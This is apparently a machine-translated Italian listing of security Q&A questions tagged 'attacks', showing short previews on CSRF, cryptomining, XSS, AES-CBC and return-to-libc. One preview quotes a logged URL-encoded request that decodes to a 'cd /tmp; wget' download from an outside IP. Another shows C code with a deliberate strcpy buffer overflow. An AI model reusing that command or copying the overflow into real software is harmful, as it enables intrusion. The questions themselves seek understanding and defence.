Domande con tag 'attacks'

2
risposte

Come verificare se un programma sta estraendo la crittografia in background

Ho notato un programma che ho scaricato di recente perché il mio utilizzo della CPU aumenta del 30% e l'80% di utilizzo della GPU aumenta in stato di inattività. Non è affatto un programma intensivo di GPU. Sono preoccupato di ciò usando il mio...
posta 26.02.2018 - 18:04
2
risposte

Che cosa può fare un utente per proteggersi dagli attacchi CSRF?

Se sto navigando mentre sono connesso al mio pannello di hosting o router o qualsiasi altra applicazione, c'è una possibilità di essere violato da un CSRF exploit. Quindi, la domanda qui riguarda l'utente o il lato client, non la protezi...
posta 17.04.2016 - 19:15
1
risposta

Fattibilità computazionale della ricerca di "buoni collegamenti" del seguente formato

Recentemente mi sono imbattuto in questo e sto verificando qui per vedere se ciò che sto proponendo è effettivamente fattibile e può essere considerato una violazione della privacy. Per ovvi motivi, non sto rivelando il sito web che presenta...
posta 24.09.2012 - 03:32
1
risposta

Quali passaggi è necessario fare per identificare il buco di sicurezza

Uso l'hosting VPS. Installato CentOS 6 e ZPanel secondo questo tutorial link Avviso ricevuto dal provider di hosting: Questo URL è stato identificato come sito di phishing ed è attualmente coinvolto in attività di furto di identità. URL: hx...
posta 23.10.2013 - 16:56
1
risposta

Come può funzionare questo attacco?

Stavo navigando nei miei log di apache e ho trovato la seguente richiesta (che ha provocato un 404): 106.75.130.216 - - [DD/MMM/YYYY:hh:mm:ss] "GET /shell?%63%64%20%2F%74%6D%70%3B%77%67%65%74%20%68%74%74%70%3A%2F%2F%36%31%2E%31%36%30%2E%32%...
posta 26.03.2017 - 20:29
3
risposte

Permettere a tutti di sapere quando è stato avviato un processo del server comporta un rischio per la sicurezza?

Recentemente ho scoperto che nel framework Microsoft .NET un thread impersonato non è autorizzato a richiedere "il momento in cui è stato avviato il processo corrente". Questo potrebbe essere fatto intenzionalmente o questo potrebbe essere un de...
posta 18.03.2013 - 10:17
1
risposta

La conseguenza della sicurezza del buco Javascript in una chat online?

Per una chat online che consente l'HTML di base, cosa succede se lasciano un modo aperto a un potenziale hacker di eseguire javascript su tutti gli utenti della chat? Qual è la cosa peggiore che potrebbero fare?     
posta 02.06.2013 - 01:29
1
risposta

Gli attacchi attivi possono realmente decrittografare un particolare file crittografato AES-256, CBC, PKCS # 7?

Recentemente ho scoperto che gli attacchi attivi sono una minaccia contro AES-256, modalità CBC, riempita con PKCS # 7 (in particolare la modalità CBC. Dovrei cambiare in EAX per proteggermi da questi attacchi). Tuttavia, sono confuso se tali...
posta 28.02.2013 - 20:22
2
risposte

Usando la password di Veracrypt debole è sicuro?

È sicuro creare una partizione di Veracrypt (su una USB) tale che occupa tutto il dispositivo (cioè non un "file", ma usa l'USB come contenitore di memoria) contiene solo un volume standard (nessun volume nascosto) utilizza una password...
posta 25.04.2018 - 18:28
3
risposte

Inserisci una stringa nella memoria con carattere null

Sto cercando di implementare return-to-libc, ecco il codice void func(const char *str) { char buf[4]; strcpy(buf,str); printf("you entered [%s]\n",buf); } int main(int argc, char *argv[]) { if(argc != 2) { printf("Nee...
posta 24.09.2013 - 08:25